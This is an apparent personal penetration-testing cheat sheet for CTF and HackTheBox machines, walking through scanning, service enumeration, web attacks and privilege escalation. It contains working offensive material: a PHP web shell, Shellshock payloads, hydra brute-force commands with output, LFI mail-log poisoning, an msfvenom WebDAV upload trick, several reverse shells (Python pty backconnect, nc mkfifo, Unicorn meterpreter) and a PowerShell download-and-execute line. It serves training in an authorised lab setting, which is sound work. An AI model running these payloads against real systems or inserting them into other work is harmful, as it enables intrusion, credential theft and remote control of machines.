Skip to content

Malrawr's Penetration Testing Workflow (CTF)

These notes are currently a work in progress. The goal is to create a complete workflow sheet using all my notes. It may be a little messy at first but I plan to organize it as time goes on.

`7MMM.     ,MMF'      db      `7MMF'      `7MM"""Mq.        db `7MMF'     A     `7MF'`7MM"""Mq.  
  MMMb    dPMM       ;MM:       MM          MM   `MM.      ;MM:  `MA     ,MA     ,V    MM   `MM. 
  M YM   ,M MM      ,V^MM.      MM          MM   ,M9      ,V^MM.  VM:   ,VVM:   ,V     MM   ,M9  
  M  Mb  M' MM     ,M  `MM      MM          MMmmdM9      ,M  `MM   MM.  M' MM.  M'     MMmmdM9   
  M  YM.P'  MM     AbmmmqMA     MM      ,   MM  YM.      AbmmmqMA  `MM A'  `MM A'      MM  YM.   
  M  `YM'   MM    A'     VML    MM     ,M   MM   `Mb.   A'     VML  :MM;    :MM;       MM   `Mb. 
.JML. `'  .JMML..AMA.   .AMMA..JMMmmmmMMM .JMML. .JMM..AMA.   .AMMA. VF      VF      .JMML. .JMM.

Initial Scan

Save time and do a full port scan of the machine. This let's you have a fully comprehensive over view of the machine. It's really easy to miss something if you do a standard scan, especially in a CTF which is more puzzle-like. Usually a TCP scan is all you need when doing CTFs, but sometimes it might be wise to do a UDP scan as well.

NMAP

For an indepth TCP nmap scan you can do something along the lines of: nmap -sC -sV $IP_ADDRESS -p-

The -p- flag in nmap means to scan all ports.

For a UDP scan it's generally better to not scan every port: nmap -sC -sV -sU -T4 $IP_ADDRESS --top-ports

The -T4 flag adjusts the timing and speeds up the scan time.

Using nmap nse scripts you can also enumerate using scripts that detect vulnerabilities: nmap --script *vuln* --script-args=unsafe=1 $IP_ADDRESS -p $PORTS

Use this nmap scan with caution, it can potentially take down any weak services. Generally you shouldn't go all out with using this.

Quickfire

One of the downsides of doing a full port scan is the amount of time it takes. In order to remedy this I've created a wrapper that combines masscan and nmap together (https://gitlab.com/malrawr/quickfire). This makes it much faster than just relying on nmap alone. Additionally it can use amap to give you more information about each open port that you are dealing with.

Port Enumeration

Always check everything very closely and go through each port one by one. Sometimes ports are tricky, expecially HTTP ports. One way to check a port that you're unsure about is to use curl. curl is normally used for HTTP, however it can be used on any port to see what protocol the ports asks for. It's particularly helpful in finding those odd HTTP ports really quick.

`curl $IP_ADDRESS:$PORT`

Another tool to use is amap, it generally gives more detailed information about a port.

amap $IP_ADDRESS:$PORT

Search everything that you encounter, such as programs and their version numbers. Use either searchsploit or google dorks using site:exploit-db.com/exploits/

Using google dorks instead of searching manually through the exploitdb website will allow you to avoid using the website captcha.

When searching for the version number of an application be sure to also test the older version exploits, even though they may be listed as an older version it can also mean that other versions are also susceptible to the same vulnberability

One last important thing to remember is to take advantage of nmap nse scripts. If you find a port that you believe may be vulnerable to something try to see if there's a nmap nse script for that. You can find them by using updatedb and locate *.nse.

Enumerating Ports with Metasploit

You can use Metasploit to search for auxillary, exploit, and payload modules by using the search command.

msf > search port 22

Matching Modules
================

   Name                                                                  Disclosure Date  Rank       Description
   ----                                                                  ---------------  ----       -----------
   auxiliary/admin/2wire/xslt_password_reset                             2007-08-15       normal     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                              normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/admin/atg/atg_client                                                         normal     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/hp/hp_imc_som_create_account                          2013-10-08       normal     HP Intelligent Management SOM Account Creation
   auxiliary/admin/http/allegro_rompager_auth_bypass                     2014-12-17       normal     Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/http/hp_web_jetadmin_exec                             2004-04-27       normal     HP Web JetAdmin 6.5 Server Arbitrary Command Execution
   auxiliary/admin/http/kaseya_master_admin                              2015-09-23       normal     Kaseya VSA Master Administrator Account Creation
   auxiliary/admin/http/limesurvey_file_download                         2015-10-12       normal     Limesurvey Unauthenticated File Download
   auxiliary/admin/http/manageengine_dir_listing                         2015-01-28       normal     ManageEngine Multiple Products Arbitrary Directory Listing
   auxiliary/admin/http/manageengine_file_download                       2015-01-28       normal     ManageEngine Multiple Products Arbitrary File Download


FTP - 21

First step when finding a FTP server is to see if there's anonymous login. If there is anonymous login what can you do with it? Enumerate all files if you can.

Whenever there is anonymous upload, always enumerate the files, you may be able to find passwords or system information and also test if you can upload files, if you can upload then try to see if you can execute them

  • Does the FTP server have a wwwroot directory? Is it possible to upload files into this directory?
  • Does the FTP server have arbitrary file access? What information can you find?
    • What is the OS version?
    • What information can you find about other services?
    • Can you find any passwords?

Nmap has a number of NSE scripts that may be helpful for enumerating FTP: nmap --script ftp* $IP_ADDRESS -p 21

Open OS Filesystem

Sometimes FTP is misconfigured to the point where you can view the entire file system of the machine.

  • Windows
    • Windows XP
      • C:\Windows\System32\eula.txt
    • Windows 7
      • C:\Windows\System32\license.rtf
  • Linux
    • cat /etc/lsb-release
    • cat /etc/issue.net
    • Debian
      • cat /etc/debian_version
    • Red Hat
      • cat /etc/redhat-release

SSH - 22

It's uncommon to find a vulnerability for SSH. Usually the only way of getting in through this to bruteforce using hydra or if you found a user and password.

A good way to see if a user exists on SSH is to use SMTP to VRFY users. If the user exists and you found a password somewhere, that could be your ticket in.

SMTP - 25

Use SMTP to verify that a user exists. For example, if you find a user while enumerating another application, if you want to check that the user exists on the system you can verify using SMTP. If that user exists you can possibly try logging in with SSH as the user using a password from the other application.

DNS - 53

  • When you see DNS open it probably means that it's using a different hostname/virtual host, this is further established by the fact that if you visit the IP address a default index page is served. This indicates DNS misconfiguration.
    • Basically look out for virtual hosts
      • curl -H 'Host: virtualhost.host' http://127.0.0.1/
        • Can also add the host to your /etc/hosts file
    • You can also use the following commands to map out the target; it'll show what the IP maps out to/zone name. You can also use the virtual host name/zone name to do it in reverse and see if it maps to an IP address. ``` nslookup

      server $IP_ADDRESS $IP_ADDRESS or $VIRTUAL_HOST_NAME ```

  • DNS Zone Transfer Records
    • Helps you find records, if TCP 53 port is open then that means you'll be able to get these records and enumerate the machine
    • dig axfr @<IP ADDRESS> <ZONE NAME> ---- Note: The is what you find from nnslookup
      • This will show you more subdomains used in the DNS Zone Transfer, you can then add this list to your /etc/hosts file so that you can visit them easily without modifying Burp's headers

HTTP/HTTPS - 80/443 & Other Ports

When visiting websites it's important to find as much infromation as you can. You have to manually poke around, don't rely on an automated scanner like nikto to find things out for you.

Questions to Ask

  • Does the source mention anything about a program? Does the source contain any version numbers?
  • What language is the server running? PHP? ASP? Etc.
    • This is important for uploading or knowing vulnerabilities
      • For example. Let's say you found a host running FTP and HTTP servers. You also discover that you can upload through FTP and access the file through HTTP. Well to execute that file it has to be readable by the server.
  • What filetypes does the server allow for uploading?
    • Perhaps, you can take advantage of this by generating a payload with a specific format. bash msfvenom --help-formats Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
  • Is there a login page?
    • Have you tried using default credentials?
    • Have you tried using google to find default credentials for the application and version?

      It's a good idea to create a custom wordlist with default credentials, so that you can use hydra to automate it while you poke around. I talk more about this in the hydra section below.

  • Does the web application have an admin console? Can you exploit it?
  • Does the web application allow uploading?
    • It allows uploading but it won't accept my file type?
      • Try checking to see if it uploads it anywayy but in a Temp folder?
      • Is there a way to bypass the file check?
      • Try seeing if you can upload a malicious file that it can accept?
      • I uploaded my file but I don't know how to access it?
        • Did you try seeing if you could traverse directories?
        • Perhaps you can try using an LFI to visit the file
  • Does the website use WEBDAV?
    • Can you upload into it?
    • Try Cadaver?

      Check the webdav section for more information

Visit Website

  • When checking a new site using burp suite try changing the 'Host' field. Instead of the IP, you change it to the domain name of the server. This is for Virtual Host routing. The server will look at the new header and try to to see if a different location exists.
  • Try using curl on pages, they may display something different compared to when using the 'view source' page on FireFox

Gather Info

  • whatweb http://127.0.0.1/index.html
    • It gives you a general idea of the underlying technologies running on a website

Directory Brute Force

  • dirb http://127.0.0.1 -r -o tmp.dirb
    • r - disable recursive mode
    • o - output to file
  • dirbuster
    • Use multiple wordlists:
      • /usr/share/dirb/wordlists/common.txt
      • `/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
      • /usr/share/wfuzz/wordlist/general/megabeast.txt
    • Use common extensions
      • /usr/share/wfuzz/wordlist/general/extensions_common.txt
    • Use the tabs to sort results by response

Uploading Stuff to Web Applications

  • Some times a specific file type is requested, there are a few ways to bypass this:
    • Magic Bytes
      • These are the first few strings in a file that say what the file is, you can copy enough from a valid file and then put your malicious string after that. To check if it's being properly concealed you can use the bash file command and see what file it thinks it really is.
    • Add double the extension
      • Let's say it's looking for a PNG file, you can do something like evil.png.php, the .png inspection is just in case the website tries to see if it's valid.
        • You can do variations of this also.

Uploading Web Shells

  • Simple Webshell
    • <?if($_GET['cmd']) {system($_GET['cmd']);}?>
  • Microsoft ISS
    • Try both asp or aspx shells
      • This mostly depends on the version of ISS that is running.

Wordpress

  • Scan with wpscan and check out the admin pages to see what you can with find
    • wpscan --url http://10.10.10.10/ --enumerate u or wpscan --url http://10.10.10.10/ --enumerate u --log
      • Scans for users using --enumerate u
  • Wordlists To Use
    • /usr/share/seclists/Discovery/Web_Content/CMS/wordpress.fuzz.txt
    • /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt
    • /usr/share/seclists/Discovery/Web_Content/CMS/wp_themes.fuzz.txt

Shellshock

  • If you find a random sh file on a website directory test it for Shellshock
    • curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" $IP/cgi-bin/user.sh
  • CGI-BIN or .cgi using programs like Webmin are usually susceptible to Shellshock
    • In Burp change the User-Agent to:
      • User-Agent: () { :; }; echo hi
  • Some servers react differently to ShellShock, for example Apache will respond immediately but Webmin may not show a response.
    • You can use something like () { :; }; sleep 10 to see the time it takes to respond, if a server usually responds to a request in 2 seconds, but after using the sleep command it's longer than that chances are that it is vulnerable.

Directory Bruteforcing Tips

  • If you can narrow down a few directories of interest, try narrowing the bruteforcing. You can use a giant wordlist on just one directory in order to enumerate it well.

Proxies

  • When going through proxies try experimenting with the names of the IP addresses in order to gain access, similar to DNS.
    • Lookout for virtual hosts
      • curl -H 'Host: virtualhost.host' http://127.0.0.1/
        • Can also add the host to your /etc/hosts file

Attacking Login Pages

Whenever you're enumerating a webpage you should run sqlmap in the bkacground while you poke around. At the same time you can also use

SQLMAP
  • Capture the post request of the login screen and paste it into a new file
  • Use the following commands to run, either one works, you can press enter for default options whenever it prompts
    • sqlmap -r login.req
    • sqlmap -r login.req --level 5 --risk 3
Hydra

Bruteforce all login pages that you see, even though you can just manually put in entries yourself and reload. It's faster to just use Hydra while you do other stuff.

Hydra Flags used in example, from man pages: -f exit when a login/pass pair is found -l login with LOGIN name

To use hydra without a username do -l "" * -P load several passwords from FILE

  1. When bruteforcing pages, you need to specify the plugin used. In this example it is http-post-form.

    There's a difference between http-post-form and https-post-form. Make sure you use the right one appropriate to the protocol.

  2. Use burp to create capture a post request to the website
  3. Put in the post request line from burp, replace the user and password with ^USER^ or ^PASS^.
  4. After that you append something from the page the happens when a login page is not successful, in this case the phrase is incorrect appears
root@kali:~/tmp/htb/apocalyst# hydra -f -l falaraki -P list.txt apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-31 00:58:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task
[DATA] attacking http-post-form://apocalyst.htb:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect
[80][http-post-form] host: apocalyst.htb   login: falaraki   password: Transclisiation
[STATUS] attack finished for apocalyst.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-31 00:58:38

The example above is from a retired HTB machine named Apocalyst

Default Passwords or Obvious Passwords
  • The user/password field could be the name of the application or something on the same page
    • The rational behind this is that it's something easily findable on the page so that a lazy system administrator remember in the future.
      • You can use cewl to get an idea of what the password can be.
    • Use the cewl wordlist to create a custom wordlist and bruteforce the page with it.

Local File Inclusion (LFI)

  • When you find an LFI vulnerable page, see if it has any passwords listed on it that you can use. Usually the one listed the most is vulnerable.
  • Check /etc/fail2ban/fail2ban.conf
    • This is an application that blocks the use of Hydra and other brute-force tools. If that exists then it means we can't brute-force, so we'll have to input passwords in manually.
  • /proc/self/status
    • You can find the uid and gid of the current user.
    • Use the UID found to see what the user is in the /etc/passwd file
  • /proc/self/environ
    • If you have access to this file you can modify your user agent line to be a php command and it will execute on the machine
  • ~.ssh/id_rsa
    • Instant private key
  • Poisoning Mail

    • When connecting to SMTP using telnet, wait for the mail server to respond back with their banner.
      • Then do the following:

    EHLO `hacker.htb` VRFY target@localhost <-- This is the user that the server is running as mail from:[email protected] rcpt to: target@localhost data Subject: <whatever> `<?php echo system($_REQUEST['evil']); ?>` . <-- This is to end the message It should then say that the message is queued. Using the LFI visit the mail file, ../../../var/mail/target%00&evil=whoami * You should of achieved command execution.

    Webdav

    First check how webdav works with the server version. It might require a certain trick for uploading to work.

  • For example, you generate a msfvenom reverse shell in asp format called evil.txt.

  • After uploading with curl -T evil.txt http://<IP ADDRESS>/ you then use cadaver http://<IP ADDRESS>/ in order to rename the file from evil.txt to evil.asp;.txt.

This takes advantage of the servers vulnerability.

An example of this process is below:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
curl -T evil.txt http://<IP ADDRESS>/
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt

Then you execute the file by visiting the file using the browser or curl.

TFTP - 69U

Treat TFTP like you do FTP. TFTP is generally more common in Windows machines.

POP3 - 110

RPC - 111

SMB - 139/445

SMB generally releases a lot of information. The quickest way to enumerate this service is by using enum4linux.

enum4linux -a $IP_ADDRESS

Viewing Shares

If a share is found you can view and access it using smbclient.

View share names, share types, and comments: smbclient -L $IP_ADDRESS

Accessing shares: smbclient '//$IP_ADDRESS/$SHARE_NAME>'

Navigating through SMB shares is similar to FTP. They can also share similar vulnerabilities such as arbitrary file access.

Common Exploits

Scanning for these vulnerablities using nmap may crash the SMB service

MS08-067

Check with: nmap --script smb-vuln-ms08-067.nse -p445 $IP_ADDRESS

MS17-010

Check with: nmap --script smb-vuln-ms17-010.nse -p445 $IP_ADDRESS

SNMP - 161

Simple Network Management Protocol (SNMP) is used for network management. When this is exposed it is possible to retrieve genreal system information such as hostname and OS version. You can also get information such as open ports and connections (basically netstat info) as well as processes and devices in use. Information such as software installed and their versions is included as well.

If you see this port open in a machine use onesixtyone $IP_ADDRESS which will reveal OS info.

Also use snmp-check $IP_ADDRESS which reveals everything about a server such as: OS Version, Users, Processes, Hotfixes, etc.

Alternatively, included in Metasploit there are Scanner SNMP Auxillary Modules that you can select from and enumerate with.

Privilege Escalation

Privilege escalation is the result of actions that allows an attacker to obtain a higher level of permissions on a victim's system or network.

Moving Files From Attacker to Victim

Use Python's SimpleHTTPServer module for transfering files from your computer to your victim.

On Linux machines you can then use wget or curl to request the files. Alternatively you can do the -r recursive flag with wget in order to download everything on that web folder at once.

On Windows you can use PowerShell. Assuming you are using PS 3.0 and wget is set up as an alias for Invoke-WebRequest, you can do something like the following: wget http://10.10.10.10:8080/evilfile.exe -OutFile evilfile.exe

Linux System

  • List commands that the user can do
    • sudo -l
$ sudo -l
sudo -l
Matching Defaults entries for www-data on webbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on webbox:
    (scriptworker : scriptworker) NOPASSWD: ALL    (scriptworker : scriptworker) NOPASSWD: ALL

Basically this let's you work on any files or binaries/executables that is owned by the scriptworker group.

Linux Enumeration Scripts

Whenever you have user access inside a box, you should start off with one of the enumeration scripts below and examine the output after. Generally I like working from the /dev/shm directory instead of /tmp so I store all my work on there.

LinEnum.sh
  • It has the -t flag for thorough checks
linuxprivchecker.py
unixprivesc.sh
Resources
  • https://www.rebootuser.com/?p=1623

Using a Working Directory

  • /tmp or /var/tmp
    • A good directory for temporary work files
  • /dev/shm
    • Saves into ramdisk so that it doesn't get saved in the HDD
    • Whenever the server gets reboot everything is cleared

Spawn a TTY Shell

  • python -c 'import pty; pty.spawn("/bin/sh")' or python -c 'import pty; pty.spawn("/bin/bash")'
    • This is a simple TTY shell that just has basic functionality
  • https://github.com/infodox/python-pty-shells
    • Here you can find a collection of shells that give full functionality, similar to a SSH shell. The best shell to use is the tcp_pty_backconnect.py and the tcp_pty_shell_handler.py for the handler.
    • One Liner TCP PTY Backconnect
      • python -c 'import os,pty,socket; lhost = "127.0.0.1"; lport = 31337; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'

Other Tips - Getting Advanced Terminal Control (Bash Completion, History, and Arrow Usage)

  • First get Python Shell, the shell needs this in order to work
    • python -c 'import pty; pty.spawn("/bin/bash")'
  • Background terminal with CTRL Z
  • stty raw -echo
    • This tells the terminal to not process special characters and instead it to the next terminal which is the reverse shell we're in.
  • Grab the environment term info
    • root@kali:/# echo $TERM
    • xterm-256color
    • Bring the terminal back to the foreground using fg
  • Now you can export your term variable
    • export TERM=xterm-256color
  • After completing these steps you should now have proper terminal control
  • NOTE: MAYBE JUST NEED THIS
    • CTRL - Z
    • stty raw -echo
    • fg
    • Reset the terminal with reset
      • It'll prompt for the terminal so put in xterm-256color <--- it's the Kali's echo $TERM
    • Change size so that VIM works better
      • On personal terminal type: stty size
      • On target machine type the numbers you received: stty rows ## cols ###

Most Reliable Reverse Shell from Pentest Monkey

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Misc. Linux

Here are miscellaneous commands.

Finding Deleted Files

  • Sometimes you have to look through deleted files on a partition
    • grep -a '' /dev/sdb
      • This will show every file on the partition, it's only good for small USBs
    • You can do something like the following if you want to find something specific on a larger partition
      • grep -a 'password' /dev/sdb

Windows System

Gaining Reverse Shells

  • Unicorn Shell: https://github.com/trustedsec/unicorn
    • It basically let's you setup a quick Meterpreter shell be generating quick PowerShell Shell Code that you can paste into the target's console.
    • It helps to rename the file as .ps1 and remotely execute it on the target machine instead of pasting into the cmdline
    • unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 37337
    • msfconsole -r unicorn.rc

Windows File Transfers

  • powershell "IEX(New-Object Net.WebClient).downloadString('http://127.0.0.1:80/index.html')"
    • Tells PowerShell to go to a website and execute whatever is on that page.

Windows Enumeration with Meterpreter

sysinfo - meterpreter
  • Look at the OS and Architecture
  • What version of Meterpreter are we running? 32 or 64 Bit?
getuid - meterpreter
  • View current user
Using Post Modules
post/multi/recon/local_exploit_suggester
  • Looks at all KBs applied to that machine and then returns suggestions
  • Note the version of Meterpreter that we're running earlier
    • 32 Bit and 64 Bit return different suggestions
    • After it's complete change the process to the 64 Bit
      • Run the command ps
        • This lists all the proccess being run as well as the architecture
        • Look for processes that are x64 and have a value of 1 for the Session column
        • The 1 means it's interactive which allows for more permissions
      • migrate <PID>
        • Migrates a shell to that process
      • Run the module again and note the suggestions, if there are identical matches to the 32 bit version then that exploit has a high chance of working

Windows Enumeration without Meterpreter

systeminfo - cmd.exe
  • Look for the OS Version and the Hotfixes
    • If there's no hot fixes applied, it says "N/A" then it'll probably be vulnerable to something since it's never been updated since it was installed
      • Correlate the age of the OS to the years that exploits came out
        • For example if you have a Windows 7 box that has no updates since it came out, which was 2009. Then the list provided by the Metasploit module may work since it has never been updated.
PowerShell Module - Power UP
  • Mainly looks at PrivEsc through service misconfigurations, not really through patches like the Metasploit Module
    • Windows Enumeration
      • Scripts
        • https://github.com/joshruppe/winprivesc
        • https://github.com/GDSSecurity/Windows-Exploit-Suggester
        • https://github.com/pentestmonkey/windows-privesc-check
      • Cheat-sheets
        • https://www.joshruppe.com/basic-windows-enumeration
        • http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html